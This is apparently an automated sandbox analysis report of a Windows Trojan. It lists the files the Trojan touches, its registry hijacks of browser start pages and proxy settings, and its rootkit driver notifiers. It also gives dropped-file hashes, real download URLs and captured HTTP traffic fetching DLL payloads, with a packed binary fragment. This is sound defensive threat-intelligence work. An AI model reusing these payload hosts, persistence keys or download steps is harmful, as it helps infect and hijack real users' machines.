C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Windows\System32\55ed1\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Windows\HODVVjX\yhBYqbv.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Windows\HODVVjX\MEdRGQmCh.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q5LVK3U2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

Registry activity

The process b38a20ed8a675be0d249881f09a0b7a.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\System\CurrentControlSet\services\9wvEHUrJ2hI]
"ImagePath" = "\DosDevices\C:\Windows\system32\55ed1\CDClient_EX.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKLM\System\CurrentControlSet\services\9wvEHUrJ2hI]
"Devname" = "9wvEHUrJ2hI3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKLM\System\CurrentControlSet\services\9wvEHUrJ2hI]
"ErrorControl" = "1"
"Start" = "3"
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\b38a20ed8a675be0d249881f09a0b7a_RASAPI32]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
89d67caa050c7cdcd0d25617570c5100 c:\Windows\HODVVjX\JOuGkVG.dll
0a3d189c49f1d4f4b1b33f39e4df1a15 c:\Windows\HODVVjX\YUrQRuLp.dll
361d273773994ed11a6f1e51bbb4277e c:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\55ed1\aDVxAKMfkm1.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\55ed1\aDVxAKMfkm1.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\55ed1\aDVxAKMfkm1.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 385024 127488 5.54411 1047ddeae3262755b8843e631c688971
.rsrc 389120 8192 5632 4.74875 cf8b169895c2ed829f8999493f5cfa70

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
95e041d3872e055a2d44f42a2c9b845f

URLs

URL IP
hxxp://udo.jxwan.com/index/getcfg?id=58075 119.97.143.18
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://5636.ecoma.ourwebpic.com/d2/wblm.dll
hxxp://w.c-cnzz.com/cfjs/5636.js 47.89.2.197
hxxp://dld.jxwan.com/d2/x86.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/CDClient.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/wblm.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
xxx.baidustatie.com 182.140.215.71


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

HEAD /d2/wblm.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 09:57:30 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 16 Jun 2017 03:17:15 GMT
Content-Type: application/octet-stream
Content-Length: 451016
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/wblm.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 09:57:30 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 16 Jun 2017 03:17:15 GMT
Content-Type: application/octet-stream
Content-Length: 451016
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........< ..]E..
]E..]E......]E..R...]E......]E......]E.....n]E..%...]E..%...]E..]D.{]E
..$...]E..$...]E......]E..]...]E..$...]E.Rich.]E.........PE..L...\\BY.
..........!................0..........................................
.....j.....@.............................8...l...h.......l............
.... ..........................................$...H..................
.........................UPX0....................................UPX1.
...............................@....rsrc..............................
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..........3.91.UPX1....G.<..S/..y..!.......&...!...h.........Y....@
r!.rp`P...[..|(.......3@*...?.. .).R9L...m'.......4........SkVW..3.W,.
)X...........u....._..^.7d.....p......................................
..........@..*.....@..0.@..@@..@..P.d..@..t...8...@.D.9.?*.r.9.*.*....
......c... .~...r._*.*..S.) . .BN!. 0 H(Nq. P' \.IN!. p |..%.tJ#.8.../
i#6....}.JG.o%...u..U...E..V.....&.....t.V..`.t]._J..9..U....H.>..{
....U.....u.R.P.V.R;J.u.......;.(....q2...,.?.;HZ.E.u.\YU........_QV..
.E..i..p.F.......Y...V..E..F....E.......:.u.3.QR...#.7..`....W.y..
<<< skipped >>>


GET /cfjs/5636.js HTTP/1.1
Host: w.c-cnzz.com


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Wed, 28 Jun 2017 15:28:57 GMT
Content-Type: application/javascript
Content-Length: 395
Last-Modified: Fri, 16 Jun 2017 09:01:47 GMT
Connection: keep-alive
ETag: "59439e7b-18b"
Accept-Ranges: bytes
2994179e7OsseQ9NnzOorHkPTV81tCx5D01fNbQ14M9NXzH4bHkPTV8v823/lFRPTV8y6v
P3z01fM2oz/zWw7alPTV8zajP/M3GvPY9NXzNqM/8zca8 D01fLXju/ey6b 0PTZ8yaLIy
z0yfLrPs8k9MnzM2L3kPTJ817CxuL/xsaw9NnzXsLG4yKuxrD02fLDmsb696cncPTV8taX
WsNK1PTJ8w9TKpz0yfLrPu/c9Mny5pcmzPTM7MjA7c3JjPSJodHRwczovL3cuYy1jbnp6L
mNvbS9jLnBocD9jaWQ9MjAwMDAwMDkmdG09JXUifTtmaXhlZD0iaHR0cHM6Ly93LmMtY25
6ei5jb20vY3Byby5waHA/Y2lkPTIwMDAwMDA5Ijsc4bc8HTTP/1.1 200 OK..Server: 
nginx/1.10.1..Date: Wed, 28 Jun 2017 15:28:57 GMT..Content-Type: appli
cation/javascript..Content-Length: 395..Last-Modified: Fri, 16 Jun 201
7 09:01:47 GMT..Connection: keep-alive..ETag: "59439e7b-18b"..Accept-R
anges: bytes..2994179e7OsseQ9NnzOorHkPTV81tCx5D01fNbQ14M9NXzH4bHkPTV8v
823/lFRPTV8y6vP3z01fM2oz/zWw7alPTV8zajP/M3GvPY9NXzNqM/8zca8 D01fLXju/e
y6b 0PTZ8yaLIyz0yfLrPs8k9MnzM2L3kPTJ817CxuL/xsaw9NnzXsLG4yKuxrD02fLDms
b696cncPTV8taXWsNK1PTJ8w9TKpz0yfLrPu/c9Mny5pcmzPTM7MjA7c3JjPSJodHRwczo
vL3cuYy1jbnp6LmNvbS9jLnBocD9jaWQ9MjAwMDAwMDkmdG09JXUifTtmaXhlZD0iaHR0c
HM6Ly93LmMtY256ei5jb20vY3Byby5waHA/Y2lkPTIwMDAwMDA5Ijsc4bc8..



GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 10:20:35 GMT
Content-Length: 19745
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Fri, 23 Jun 2017 04:05:27 GMT
Accept-Ranges: bytes
ETag: "9ee287f2d5ebd21:166eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 18489
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
. ..html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h
3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,t
h,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:
0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var
{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th
{text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{co
ntent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:
text-top}sub{vertical-align:text-bottom}input,textarea,select{font-fam
ily:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}lege
nd{color:#000}.....html{height:100%;}.....body{height: 100%;font-size:
 14px;}.....table{table-layout:fixed;border-collapse: collapse;border-
spacing: 0;margin: 0 auto;}.....input,button{font-family: Tahoma,Arial
, Helvetica,"Microsoft Yahei";}.....a{color: #1c5f82;text-decorati
<<< skipped >>>


HEAD /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 10:08:06 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/x86.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 10:08:06 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
